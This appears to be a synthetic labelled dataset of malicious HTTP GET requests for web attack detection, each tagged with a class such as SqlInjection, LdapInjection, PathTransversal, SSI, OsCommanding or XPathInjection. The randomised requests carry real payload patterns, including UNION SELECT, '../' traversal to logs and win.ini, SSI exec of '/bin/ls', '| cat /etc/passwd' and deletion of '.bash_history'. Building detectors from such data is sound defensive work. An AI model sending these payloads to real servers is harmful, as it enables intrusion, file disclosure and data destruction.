Accept-Charset: shift_jis, ks_c_5601-1987, euc-kr;q=0.0
Accept-Encoding: 
Accept-Language: t-uaedu, tfd-ipf
Cache-Control: min-fresh=2091
Client-ip: 146.221.195.70
Cookie: jn0Tt=2475;iinmoCsel=eGdbocweo@a xp_eputa ;nt2h9ObhbIwaoi=49708;tpetsttonesjM=52589948;tdcsa1aumj1tmil=5758070
Cookie2: $Version="722"
Date: Mon, 26 Apr 10 23:31:34 CET
ETag: "0SWfCM2GR5Cqg50ns-"
Expect: 100-continue
From: 3Esa@eyeczeelt.net
If-Modified-Since: Fri, 20 Mar 09 08:23:22 UTC
If-Unmodified-Since: Wed, 20 Dec 06 23:06:13 GMT
If-Match: "kfdn1RX75_0zJqGC94"
If-None-Match: "NfvBFjOek-q-jol_8"
If-Range: "U54kFk7V4KnyUxW3W1O"
Max-Forwards: 1
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: nhNb Ddocr7n=Tpxcise
Referer: /owcb6/eoentii3/bct08E/tnwb/Tewev.exe
TE: chunked,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 9.9; io-u2; rv:1.6.2) Gecko/51587725
UA-CPU: MIPS
UA-Disp: 395,6940,8
UA-OS: Windows 98
UA-Color: color32
Via: 1.5 254.69.99.82, FTP/2.6 www.xTeEsm.jpg, 6.8 www.oezt.js
Transfer-Encoding: gzip
Upgrade: ots/8.0, lue/4.8, i4tA9/1.0, wwhs/5.4
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40670
Start - Id: 38362
class: LdapInjection
GET /eEeshgncswr/iYV9B1B/Q-q/a-0tJDFw6/-Ty/wFsaajtSnrh/QQqhq5ciBGrAtG/htaccesjjkO-uV@Jincludeorfe/2zK-DS/hKE-/Tane3scjaeshpp/bnDyOngtres6evagotc.html?wtmrh=%29++++%28+%7C+%28ea%3D4o*%29&tileuat=ulseiitritdktoi&rhemosjrrsteTRb=s5adBjFb0&0access_logYservicesWV=dinputmko&uwiBrqneb4oeem=n6&oEwndqepbn8=813&ii53ehwseengla=hes%24t&eeasnx2ha5ap5=rcpOtre&jnoysi0rms=27605674&iq=netcatsbt%7EecZ6tw&tddyano4h=mei%5Cin%3C4txntenetcatedocument%3B%3Dg HTTP/1.1
Host: 42.42.210.51
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1251;q=0.5, isiri-3342;q=0.3, x-mac-roman;q=0.4
Accept-Encoding: compress;q=0.0, gzip;q=0.0
Accept-Language: i3heatd-n, iiu-t;q=0.8
Cache-Control: max-stale
Client-ip: 193.201.183.61
Cookie: eo=andrslc
Cookie2: $Version="394"
Date: Wed, 09 Feb 05 15:34:53 GMT
ETag: "hV-qto-LnVx2CyqW"
Expect: 100-continue
From: ri1uNdit@reossclvd.be
If-Modified-Since: Fri, 23 Jul 04 02:36:40 CET
If-Unmodified-Since: Wed, 19 Dec 07 21:49:55 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 24 Nov 04 12:17:25 CET
Max-Forwards: 87
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="epfYqHet"
Authorization: Digest uri=/rryrfae/azuenL/tsor.pdf
Range: 84-89,256260-35,5-
Referer: http://letnodon.st/waeas/efmreh/cfotSap/SroEci/njdn.gif
TE: gzip,deflate;q=0.7,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.1 (Windows; U; Win 9x 1.7; Eo-r1; rv:1.5.5) Gecko/87231531
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 231x314
Via: 8.2 www.nxQa2r.js
Transfer-Encoding: identity
Upgrade: ooh/1.6, rCeq/8.8
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38362
Start - Id: 46421
class: PathTransversal
GET /uSetn75ju0t6rv5/qNfcrs5/nrMemqEietonesT/VH0U8l/shw9s6MO6sgamB6J..html?gSndZl7gNtJnoe=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&nIfnUc=c3zGVwt60w&oor=e0bysoEiedoe%2Fta&arelLs5eJu=6055 HTTP/1.0
Host: 151.85.202.223
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr;q=0.7, windows-1250;q=0.7, iso-10646-ucs-2;q=0.7, koi8-r
Accept-Encoding: compress;q=0.3, identity;q=0.7, identity, deflate
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 246.216.165.119
Cookie: ef=031;LreplaceSc=)tr;iposition.LPN=log;llstvoysc=daeeuxljarex;xy6B=22901
Cookie2: $Version="1"
Date: Sat, 18 Mar 06 08:35:18 GMT
ETag: "IY66ek_V0ngLo.jtW5A"
Expect: 100-continue
If-Modified-Since: Thu, 23 Jul 09 19:54:20 CET
If-Unmodified-Since: Wed, 21 Apr 04 06:25:15 CET
If-Match: *
If-None-Match: ".RpAnNR_VQY1BZ-HZE9"
If-Range: Thu, 24 Jun 04 10:45:35 GMT
Max-Forwards: 75
MIME-Version: 8.1
Pragma: pes='Jgt1rt'
Proxy-Authorization: Basic NWNzdDo3d0Q1bGVk
Authorization: sfws er9q=Anee9o
Referer: http://eoaal.de/t7oru.jpeg
TE: trailers,trailers
Trailer: Trailer
User-Agent: dToni5/3.2
UA-CPU: x86
Via: 6.7 18.241.132.150, FTP/7.2 183.79.25.16:01
Transfer-Encoding: deflate
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 223 232.197.120.51 "npays3" "Wed, 14 Jun 06 02:27:53 UTC"
X-Forwarded-For: 242.103.195.112
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46421
Start - Id: 41933
class: SqlInjection
GET /jgstc9tweevalM/@TwCq35.wj/rnelit/rf3bddJI_NAi/artsia8hgaergipSen/u8vZWALbrp.pl?acOtnaf=6t&eq.s-telnetFS=%27++%29++UNION++++ALL+++SELECT++6llntmf+++++FROM++eiemre+++WHERE+++++%28+%27%27+++%3D++%27&2uqieYrt2Caa=ge%3Cenhna HTTP/1.1
Host: 89.57.2.172
Connection: keep-alive
Accept: application/*;q=0.3, audio/*, image/*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.1, identity;q=0.9, deflate, identity, identity
Accept-Language: as9N7dts-sh
Cache-Control: only-if-cached
Client-ip: 167.205.9.192
Cookie: iiabsn1pft5a=v ;aac=window.openi Ot7oltdocumentmochar\si
Cookie2: $Version="26"
Date: Thu, 03 Aug 06 09:43:35 CET
ETag: W/"fVRjw.c9SadJ-A7LI2u"
Expect: yrnr=0aorOe
From: m9He0on@mdltezsc.org
If-Modified-Since: Thu, 09 Oct 08 13:01:50 CET
If-Unmodified-Since: Wed, 10 Dec 08 21:36:51 GMT
If-Match: "gezxUR8lLgf2Vj4_"
If-None-Match: *
If-Range: Thu, 08 Jun 06 19:55:45 UTC
Max-Forwards: 7
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM aWpBVDRyVWhiaUFpZW5lZkltd3ROSHd1cjFpYXp0cmV5MGxtQWFwY2Jnb3I=
Authorization: qm5t ecesdu=orTms
Range: 230210-,74601-,-666
Referer: http://NMy4.it/sbtyy/sten/u9hl/UneEotrn/toiiili.asmx
TE: gzip;q=0.3,deflate;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.7 (Machintosh; U; PPC Mac OS X 4.4; Rf-3a; rv:9.6.2) Gecko/04116235
UA-CPU: 68000
UA-Disp: 4298,556,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 724x022
Via: HTTP/6.0 www.seojecs.html, FTP/8.2 137.134.85.162:9, 0.6 www.oa8b4nt.js:819
Transfer-Encoding: gzip
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 169.141.62.144
X-Serial-Number: 79709150
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41933
Start - Id: 45737
class: PathTransversal
GET /_f/tSyRw.EN8Ye5wzN/GNyGfWtUCW7C/dVt9hHwx@fP2/logSerYsam7lallx.asmx?nUBFRCG=nae&QhahmoHaocxtnoa=6FJocyVjHB&DTdcftlsmil3dw=rntrSn&zRkSbdainouits=e%3A%5C%5CWINNT%5C%5Cwin.ini&uvowfnRec=35769082&KO0U0htaccesfQK4B=rnph-replace%25a HTTP/1.0
Host: www.thstmnREt.st:80
Connection: keep-alive
Accept: audio/*, audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 212.136.122.129
Cookie: trmhaen=cb
Cookie2: $Version="34"
Date: Sat, 22 Jan 05 21:50:02 UTC
ETag: W/"ZuZLKP3v5YD1lYXEqcG"
Expect: twlia9=reoe
From: eyebc4et@nriRuu.de
If-Modified-Since: Tue, 29 Sep 09 11:46:58 GMT
If-Unmodified-Since: Tue, 13 Jun 06 15:50:44 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Aug 07 16:44:49 UTC
Max-Forwards: 51
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Basic ZW1uZWlzYzpld2VuYQ==
Range: -500252,934-3694
Referer: /rotTnse/emiSoe/sGjfZto/unlhers.php3
TE: chunked,trailers
Trailer: Via
User-Agent: Mozilla/1.7 (compatible; Konqueror/6.0; Unix; 3oeao3etRa; nbohpEeh)
UA-CPU: Sparc
UA-Disp: 3522,615,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 979x8035
Via: HTTP/3.5 181.85.158.9:887, 5.6 www.2dao.htm
Transfer-Encoding: deflate
Upgrade: gise/4.4, ekas/4.1, Clis/0.2
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 3591562194850483
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45737
Start - Id: 40357
class: SSI
GET /a@putUodXVX1/jD6yWQ8mail/6eeslHeea/hHplO9/cAhOHex5/uk6f/1BUUUnODjAlbHs2H@4/gkthO1O/zoycN02rIQoKkh.FrS/5NcTPC/mJq79T26AWXmf.css?inputMR8CGbBs36G=93&fSnuryon=63he&ZMHetcsam35PxP4=6iee7p HTTP/1.1
Host: 203.167.111.88
Connection: lxhdTxeo
Accept: */*
Accept-Charset: windows-1255;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: <!--     #include     virtual="d:\windows\autoexec.bat"    -->
Cache-Control: no-cache
Client-ip: 225.218.231.89
Cookie: IuiEu=17766;mhFenn1Efmde=0tnralselslb;a1=eJJ6f
Cookie2: $Version="4"
Date: Thu, 12 Jul 07 15:02:06 GMT
ETag: "Rx_E-BR84jvDVoRCBf"
Expect: 6tot=dpitp
From: ly1Ctt36@ssTtb.be
If-Modified-Since: Tue, 17 May 05 03:25:48 CET
If-Unmodified-Since: Sat, 19 Apr 08 14:05:57 UTC
If-Match: "ypBuvIZh.2cFFVP@0GRc"
If-None-Match: "diB6RirOE2MAhfRRsC-D"
If-Range: *
Max-Forwards: 9
Proxy-Authorization: naloy alan=tiklUu
Authorization: Basic RHJkOTp5dGFyNG8=
Range: -62942,193769-
Referer: http://www.rehr5iso.st/caCYwoh/eol3a/sigRw/nlieid2n.avi
TE: chunked;q=0.5
User-Agent: Mozilla/4.4 (Windows; U; Win98 9.8; ef-wo; rv:4.1.9) Gecko/70073003
UA-CPU: StrongARM
UA-Pixels: 7186x8117
Via: HTTP/2.4 www.rey2Sou.htm, 3.1 www.eAsI.htm, 7.0 88.102.17.52
Transfer-Encoding: deflate
Upgrade: fwr/8.8, o6abt/9.6
Warning: 603 209.229.202.179:95978 "oe2n7zpejaLsese" "Thu, 17 May 07 21:39:03 GMT"
X-Forwarded-For: 76.58.9.70
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40357
Start - Id: 43449
class: OsCommanding
GET /m3f-7si/oODZ_coBf/Etosltwbnuhdth9bn/ui20-@/t8Ubj@zu/havbKijT4ior/fR4Yis/gssco49pTvix/s1V7.5v8b-Xq/lPwQF6Y/so.htm?hna=%27+++++%3B+++rm+%7E%2F.bash_history%3B&hgroup byQ-yVB=eWGoB-Fejd&0Lxedas=39910 HTTP/1.0
Host: www.iaae.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: d4oarnnt-nDrfn, odot-opq
Cache-Control: no-store
Client-ip: 62.234.202.158
Cookie: j14R=xml:setef1iahT0(;emaeod5rtos=ldmRgN@f;b2vasieoeh=mrcBnHE1Lbv;etIlrxaot9rdUu=0;b3l@bwhereform8HGTa=rRzvk0;t0stSteEe=catap4i
Cookie2: $Version="5"
Date: Thu, 18 Mar 04 03:24:26 UTC
ETag: W/"e09OLQplgwoQZ1tow"
Expect: 100-continue
From: Etwo@t45aetl.it
If-Modified-Since: Fri, 28 Dec 07 05:17:01 UTC
If-Unmodified-Since: Thu, 08 Oct 09 11:56:33 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Apr 04 20:57:29 CET
Max-Forwards: 3078
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: senaTy nseaDz=wasioi
Authorization: Basic aUF3c21kYWk6YW1vbkU=
Range: -0418,311-
Referer: /gqso0ta/pwgmdi/czlAsvi5/0hwit/qwzzl.php3
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.5 (compatible; Konqueror/8.2; Linux i386; o6rd; ublne; Lfsv3etNu)
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 801x1629
Via: 2.8 55.74.242.247:832, 0.5 www.oegeNlc0.shtml
Transfer-Encoding: identity
Upgrade: M4r/6.8, Aiye/1.9, wtraey/9.2, Ana/1.3, Na5he/7.8
Warning: 641 202.173.246.46 "aerLri" "Tue, 03 Aug 04 10:59:47 GMT"
X-Forwarded-For: 52.147.136.153
X-Serial-Number: 848685
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43449
Start - Id: 42619
class: SqlInjection
GET /hmataeim0fseoooeNtis/vsoeilhttzmtaSohjr/gzX.cfm?nudyeeeetdd=snwl&DfKbFgyrGSvar=sanand&08RhttpsBk69C.=eianri&402MRiKOPQ2=-eemewoml%26+esnie%24sa%3E&s3crytLys6Tpp=oTtnahh0a&s6atlnio8lEe=varnb%3Bf&RspNcf5f19tdtd=%5B5amg&osttrks=OR+++%27fbsbEf%27++BETWEEN++++%27R%27+++++AND++++%27T%27 HTTP/1.0
Host: 50.220.171.5:41083
Connection: tmoflho
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, deflate
Accept-Language: ewtNt6l-er, a-rDfhb5sc;q=0.1, tts-or;q=0.3, 27u-teein, 6ef-4disns
Cache-Control: no-cache
Client-ip: 90.119.104.221
Cookie: VG=522330;siaUxqNe=312
Cookie2: $Version="942"
Date: Wed, 14 Jun 06 03:47:40 CET
ETag: W/"FXXTyG49LAn3eWm@Zb"
Expect: 100-continue
From: auoiBfre@itih.st
If-Modified-Since: Sun, 11 Mar 07 20:47:01 GMT
If-Unmodified-Since: Thu, 17 Aug 06 04:43:01 CET
If-Match: *
If-None-Match: "ztuighI.OW0wgbl6ZpEm"
If-Range: "k_s3mn@WlgTRkLRoAi_"
Max-Forwards: 45
MIME-Version: 0.0
Pragma: Utne='qoowHten'
Proxy-Authorization: Basic ZTZhMjpyOGRzeQ==
Authorization: Basic c3Nlc29mOm1ob3R5dGJw
Referer: /euwtok/c02ussk/taadwaeg/aateev.html
TE: trailers,gzip
Trailer: Cache-Control
User-Agent: sE1qe9ygtsosI
UA-CPU: x86
UA-Disp: 4133,8176,16
UA-OS: Mac OS X
UA-Pixels: 4720x346
Via: HTTP/3.9 www.sbttgNx.htm, um8s/4.2 www.ozeU.tiff:33
Transfer-Encoding: oethN; Sk2exwoe=n1um
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42619
Start - Id: 37862
class: LdapInjection
GET /3Bhx4fjL/6tieae/5nuM._.mvM1G/o6BuTUROU.gif?n4thdxo=8544&Aiynhqutq95o=hgmmSeszinc&N7orR0=d9ea&ignoSea8C=hKyAWvD&kXvar4Rvdr_=teui&sb=Mtgm%29%28%26%28objectClass%3D++oae7*%29&sctn=3323 HTTP/1.0
Host: www.hqp5ak.cz
Connection: close
Accept: application/*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: 8ncongih-eprmsd, nlleot-dteuni;q=0.4, moasg-SDxjs
Cache-Control: l=e6dein
Client-ip: 39.35.248.126
Cookie: thusritt=objectilicaetc+h;7sp=48
Cookie2: $Version="01"
Date: Fri, 04 May 07 24:31:07 CET
ETag: "QM2AbarDrp.Gbbqs7pd"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sun, 13 Sep 09 06:17:52 UTC
If-Unmodified-Since: Sat, 27 Jun 09 07:00:07 GMT
If-Match: "c6FC5Mm@FvNAWs."
If-None-Match: *
If-Range: *
Max-Forwards: 0456
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: NTLM ZXRldGViaWF4bW54ZUhMZWZodGFhdmlXZEliZXR1c3RlZUQ=
Range: 3-43,-454,28574-
Referer: /kIfdent.jpg
TE: trailers,chunked;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: e2nwe/5.3.9.2
UA-CPU: x86
UA-Disp: 8628,0806,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 649x451
Via: HTTP/9.7 220.49.13.69, e7s/5.1 210.75.45.36:60
Transfer-Encoding: compress
Upgrade: obeThi/2.4, ems/4.7
Warning: 340 www.t8Tb0.gif "i52D9owoehei2ibsei" "Thu, 30 Dec 04 01:19:45 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37862
Start - Id: 38693
class: LdapInjection
GET /c0ivsPT-CweWYH.jpeg?drpntRuto=aR&cesbhzerdEf=9331379&ednhmes=379835&xH_NxMACc1paccept=89&yiedur8saeVh=oQGC3B20_U&v@zJCPJ=e%3A1++&LBxRphpSWY=ddNlo1eloe&mN=ujIiuoE1&ot=td%24o&qfrmyd3sesT4ll=ieledb&kipbb=981837&cMr=yr%7E%3F&lReheen=0yuedOddt&tratdssTtarBr=%29++++%28+%7C+++%28+++cn%3D*o%27brien*++++%29%28mail++++%3D*o++++%27brien*%29++ HTTP/1.1
Host: www.lniitufn8a.com
Connection: 09eoEi
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, deflate, deflate
Accept-Language: f-te0e, nq-lunetyed, 6etiEmtj-ipGdrse0;q=0.0, hctaInO-aTmrJ
Cache-Control: min-fresh=4889
Client-ip: 218.181.248.159
Cookie: uocetSs=RAtpaegdo;urnitlboes=iweecndjEdoos6lid5
Cookie2: $Version="63"
Date: Thu, 30 Aug 07 04:35:14 UTC
ETag: "fO3hMoGbmyhoF4WVadN_"
Expect: ribEgiA=itelO;odita
From: nTromT8u@pzcel.it
If-Modified-Since: Fri, 03 Aug 07 10:34:50 GMT
If-Unmodified-Since: Thu, 13 Aug 09 17:37:05 CET
If-Match: "nArH4aYAaWqdjwu"
If-None-Match: "82WF.AE6RI@rmqrM99"
If-Range: Sat, 07 Apr 07 14:03:42 GMT
Max-Forwards: 754
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Ns5wt sihbnas=Atnr6O
Range: 32-1,3888-481886
Referer: http://zele5n6.be/EOstemo.tiff
TE: deflate;q=0.7,trailers
Trailer: Cache-Control
User-Agent: skN_zZi http://www.ndnn4tl.uk
UA-CPU: 68000
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 420x9995
Via: 0.1 www.dida.jpeg, 3.6 178.2.65.161, tkUtN/6.4 www.dyvlseh5.htm
Transfer-Encoding: compress
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 502 www.ssta3set.jpeg "SptsmeMga8ettons" "Wed, 02 Apr 08 05:31:51 CET"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38693
Start - Id: 43250
class: OsCommanding
GET /yopen/eMDapNUigtSx@AnIG/joac/1XAxK/eisEuew/rnt3vlRyyL7qmpz/rNcG5VKwARx/0CkmetaCLhi6/dddfET/nlYMkGrF.jpeg?4163=atgEee+duot8wgetcznhtaccesia&eJaTrcpr5_optSt9=60565&Uur6=OnhnnCnftus6n3t&CNrcpoLp9D=miistO60da&roy5attAa=%7C++cat++++%2Fetc%2Fpasswd&e34e3ieOoips=scriptatltmp&ri0cswis9rejun=556&sIyfsntOcfsmtn=eWCKk10O-&Bu1oraeenua=8664&vKE50s=emimp&eeeeiexalaaae=eadaktWrber HTTP/1.0
Host: www.hheb.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, identity;q=0.7, gzip;q=0.2, compress
Accept-Language: *;q=0.9
Cache-Control: bRjaaa=oes
Client-ip: 92.41.242.45
Cookie: btihGetketIam6=nccS0lq;tatshkt=dos;bsi3nh0ecTa7e=504;eola1riukidLa=523571
Cookie2: $Version="5"
Date: Sat, 14 Aug 04 21:39:35 GMT
ETag: W/"4OevjYPAXE2q_Wfy7"
Expect: 100-continue
From: w5itei@2re1ofAi.st
If-Modified-Since: Fri, 23 Jan 09 07:51:43 UTC
If-Unmodified-Since: Wed, 05 Apr 06 16:25:18 CET
If-Match: "kcfwk.AaWxjtk@RI"
If-None-Match: "KNpOLxGzqwDX@7YWDblS"
If-Range: "l0pAPpZ6Jl5hp_2Tg"
Max-Forwards: 5080
MIME-Version: 8.0
Pragma: efro='teo'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Basic SnRiYTdjMHI6MmRnYWN0
Range: 6235-,3-
Referer: http://www.8mmy.net/lnRa/eetedVh/eltqs9nA.mdb
TE: trailers,deflate;q=0.3
Trailer: If-Range
User-Agent: tu-UnU http://www.6lseld.fr
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 8.6 156.239.180.64, 1.0 241.183.71.200:3
Transfer-Encoding: identity
Upgrade: nedg/4.6, yodj/9.6
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43250
Start - Id: 44760
class: PathTransversal
GET /5TrD/y5u/sueRs6swidEsnpnxoc/hzBSZGenNQg/pepecnPxQa/eTf22yEvLi1kd/vwsp/4tsirthhEnt.html?Mzynniucti=t+4%28m&wlri=nS5X_LXADZ&sdaarmexeaw0=isp&mAccehsmin=esathhEupdna&oe=03139601&tyR8zkaqcNieza=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&icshrc9pf=eAVO&runey11vem=79201&mdh=aeriMpatoienHeeef5&Orregiai=e44kAh7c6RVW&rt1OchbsyjoE=imetaCthEincludehwp-replace&aayqoi=xtAthtemtrtntymds&osu=0034844&era=bfrV&njwAoaas=8tpaCEORX HTTP/1.0
Host: www.esoe7hei.net
Connection: essyo
Accept: application/x-tar;q=0.4, image/gif
Accept-Charset: *
Accept-Encoding: identity, gzip, deflate;q=0.3, gzip
Accept-Language: a-etfsej
Cache-Control: no-cache
Client-ip: 245.254.197.131
Cookie: o6jt2taedej=aigtjfoBtq2F62;Synthii5Et=7rrDqbiaettnijret;dhltm2muSnsA0v0=eed4ahcmDsi;I0gnmeezBnyA=hEa;iSdsock_streammo)u0;sh5acgr0Utephre=tuMOTTF8;G7KchildJ9gselectu=oaYl
Cookie2: $Version="28"
Date: Wed, 02 Dec 09 01:03:57 GMT
ETag: "cKTM@veD_AQ8rVtpE"
Expect: ammm
From: 6R4thu@ercn3stwaa.biz
If-Modified-Since: Sat, 08 Apr 06 07:12:10 UTC
If-Unmodified-Since: Wed, 26 Sep 07 22:56:07 CET
If-Match: "cUUktjRxy1eKPf5mhte"
If-None-Match: *
If-Range: Tue, 07 Mar 06 18:32:05 GMT
Max-Forwards: 50
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest uri=http://sfdqq.ch/w4oi39b/rt6erG/aaebraw1/ioSfdss.swf
Range: 484-6716,4-82,-34
Referer: http://www.yanIdsEg.net/y91e/BYxnaEd/wEgybvei/srvs/lpdal.conf
TE: deflate;q=0.0,trailers
Trailer: TE
User-Agent: Mozilla/2.2 (Machintosh; U; Mac OS X 5.6; nr-nf; rv:9.9.0) Gecko/35246957
UA-CPU: Sparc
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7624x8326
Via: 8.9 www.pMbidwa.png, FTP/5.1 155.210.49.19:690, 4.0 252.68.118.181
Transfer-Encoding: compress
Upgrade: ene/3.3, dnense/3.4, iDe8je/2.2, ecTeud/6.4, a7yhir/5.9
Warning: 777 www.ehusd6.shtml "Aader5almnIete" "Mon, 11 Feb 08 10:44:13 CET"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 66520697255736682
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44760
Start - Id: 39887
class: SSI
GET /rAUaeAnvldp7/yoGlimgJJeF7.gif?entfteEnn7e=60&s6mlnI=132&eaeqwtcrsHeGrtz=naanoTra&bgconnectnEXXvZ=1432104&mspaIhr=5867168647&7rtgrv=eGnHl+YinOemdropatir%3B+e&r07eawu=58&pgTeasremxo=ish9ent&eof2ldeitx=u4%25n+ex%26t%3A HTTP/1.0
Host: www.iarb1gpNxo.uk
Connection: close
Accept: application/rtf;q=0.4, video/mpeg, application/zip;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=1
Cookie: cIxtiD2=zoreC;iHtimde1lSewT=vpsgpouf;ondt=43494;Fg=iv3Eyy.g;twizmieehnpgps=diffelezmanftptR;hrVPPkN3havings=<!--#exec  cmd="/bin/ls     -l    /home/0ler/ze"  -->
Cookie2: $Version="824"
Date: Sun, 21 Aug 05 22:19:53 UTC
ETag: W/"_AbJH3RsOkikMZrY"
Expect: 100-continue
From: rhreituu@enybs4o.gov
If-Modified-Since: Thu, 12 Oct 06 22:52:35 GMT
If-Unmodified-Since: Sun, 22 Feb 09 21:03:53 UTC
If-Match: "ta5glVPtwU65GWT3Ac"
If-None-Match: "Z7kRVkakD0dBR@E"
If-Range: Tue, 30 Sep 08 13:13:10 UTC
Max-Forwards: 5923
MIME-Version: 8.5
Pragma: iL=w
Proxy-Authorization: Digest cnonce="fyeociug"
Authorization: Basic VGVvY2dhOkdoZWw=
Range: 927-
Referer: /dadcqexa/oiogi/aeog/tepE1m/6zse.gif
TE: gzip,deflate;q=0.6,trailers
Trailer: From
User-Agent: ec0Rra83o/6.0.4
UA-CPU: StrongARM
UA-Disp: 691,3454,8
UA-Color: color32
UA-Pixels: 444x147
Via: p7o/1.3 www.lkeewdaa.js, 3.4 www.oa4t.gif
Transfer-Encoding: gzip
Upgrade: srnf48/8.0, ao0/4.6
Warning: 114 88.236.185.50 "divtciTnse" 

null

End - Id: 39887
Start - Id: 49371
class: XPathInjection
GET /sOnm/td1tAQZ@Yk09Pz.htm?fHzam7ma=dRvc&5xMqdelete=%25&iaocnzqaireu=hOdNrihm%27gNe%7C-hla&ossattH=aah&ecq6=lLu9_hnY&.kLl5OkXT=871&ren2=iKLSEQFymEso&na=coloI%27%5D+%7C+++P+%7C++++%2F%2Fuser%5B++name%2Ftext%28+++%29%3D++++%27reb9&-dropnWQ4J0avMO=565841934&iebetatAaTu=ve&tahe=17&tj0tun=61&PXsHoh-5=%7C%28nOedae9rr+b&acE1-w4Prlocationgd=30651079&rtaaeeOrlta=sH3eixAhoa HTTP/1.0
Host: 85.192.97.71:3
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.9, windows-1254;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 130.138.110.189
Cookie: miu=7stUe<rlx;qi5R2cqta6mtnuy=uljvhxnu;wieEsrqii=eitr;tietotwjase2c8a=874565;ihs=ivo
Cookie2: $Version="846"
Date: Thu, 11 Mar 04 15:07:39 UTC
ETag: W/"RkLd1rvasZXLUSjf"
Expect: Tuxyl=nqqhaaen;tyEptn=rc4e
